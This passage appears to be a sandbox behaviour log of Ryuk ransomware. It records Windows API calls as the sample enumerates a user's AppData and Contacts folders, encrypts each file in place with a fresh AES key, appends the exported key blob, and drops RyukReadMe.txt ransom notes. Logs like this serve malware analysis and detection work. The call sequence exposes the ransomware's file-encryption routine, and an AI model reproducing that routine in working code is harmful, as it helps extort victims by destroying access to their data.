returned 1 [0150.836] CloseHandle (hObject=0x18c) returned 1 [0150.859] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.863] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.863] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.864] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.864] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.864] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yKXb9QrtvXP_NF_krCM.png", dwFileAttributes=0x80) returned 1 [0150.864] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yKXb9QrtvXP_NF_krCM.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ykxb9qrtvxp_nf_krcm.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.864] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=58681) returned 1 [0150.864] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=58681) returned 1 [0150.864] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xe417, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.864] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.865] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.865] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.865] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.865] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.865] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xe539, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xe539, lpOverlapped=0x0) returned 1 [0150.867] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.867] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xe539, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xe540) returned 1 [0150.867] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.867] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xe540, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xe540, lpOverlapped=0x0) returned 1 [0150.867] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.867] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.867] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.867] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.868] CloseHandle (hObject=0x18c) returned 1 [0150.885] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.889] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.889] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.889] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0150.889] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0150.889] SetLastError (dwErrCode=0x0) [0150.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0150.890] GetLastError () returned 0xb7 [0150.890] CloseHandle (hObject=0x188) returned 1 [0150.890] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0150.890] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0150.890] SetLastError (dwErrCode=0x0) [0150.890] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0150.890] GetLastError () returned 0xb7 [0150.890] CloseHandle (hObject=0x184) returned 1 [0150.890] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0150.890] SetLastError (dwErrCode=0x0) [0150.890] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0150.890] GetLastError () returned 0xb7 [0150.890] CloseHandle (hObject=0x184) returned 1 [0150.890] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0150.890] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0150.890] SetLastError (dwErrCode=0x0) [0150.890] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0150.890] GetLastError () returned 0xb7 [0150.890] CloseHandle (hObject=0x184) returned 1 [0150.891] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0150.891] SetLastError (dwErrCode=0x0) [0150.891] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0150.891] GetLastError () returned 0xb7 [0150.891] CloseHandle (hObject=0x184) returned 1 [0150.891] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0150.891] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0150.891] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0150.891] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.891] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", dwFileAttributes=0x80) returned 1 [0150.893] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0150.893] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=1178) returned 1 [0150.893] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=1178) returned 1 [0150.893] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x378, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.893] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0150.894] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.894] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0150.894] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.895] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.895] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x49a, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x49a, lpOverlapped=0x0) returned 1 [0150.895] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0150.895] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x49a, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x4a0) returned 1 [0150.895] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.895] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x4a0, lpOverlapped=0x0) returned 1 [0150.895] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0150.895] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0150.895] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0150.895] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0150.895] CloseHandle (hObject=0x188) returned 1 [0150.910] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.915] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.915] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.915] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0150.915] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0150.915] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.915] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", dwFileAttributes=0x80) returned 1 [0150.915] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0150.916] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=1171) returned 1 [0150.916] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=1171) returned 1 [0150.916] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x371, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.916] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0150.917] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.917] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0150.917] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.917] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.917] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x493, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x493, lpOverlapped=0x0) returned 1 [0150.917] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0150.917] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x493, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x4a0) returned 1 [0150.917] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.917] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x4a0, lpOverlapped=0x0) returned 1 [0150.917] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0150.917] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0150.917] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0150.918] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0150.918] CloseHandle (hObject=0x188) returned 1 [0150.933] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.937] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.937] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.938] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0150.938] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.938] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", dwFileAttributes=0x80) returned 1 [0150.939] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0150.939] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=1177) returned 1 [0150.939] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=1177) returned 1 [0150.939] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x377, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.939] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0150.940] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.940] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0150.940] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.941] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.941] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x499, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x499, lpOverlapped=0x0) returned 1 [0150.941] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0150.941] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x499, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x4a0) returned 1 [0150.941] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.941] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x4a0, lpOverlapped=0x0) returned 1 [0150.941] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0150.941] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0150.941] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0150.941] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0150.941] CloseHandle (hObject=0x188) returned 1 [0150.967] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.971] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.971] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.971] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0150.971] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0150.971] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.971] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", dwFileAttributes=0x80) returned 1 [0150.972] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0150.972] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=1174) returned 1 [0150.972] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=1174) returned 1 [0150.972] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x374, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.972] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0150.974] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.974] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0150.974] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.974] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.974] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x496, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x496, lpOverlapped=0x0) returned 1 [0150.974] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0150.974] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x496, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x4a0) returned 1 [0150.974] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.974] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x4a0, lpOverlapped=0x0) returned 1 [0150.974] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0150.974] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0150.974] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0150.974] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0150.974] CloseHandle (hObject=0x188) returned 1 [0150.990] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.995] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.995] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.995] FindNextFileW (in: 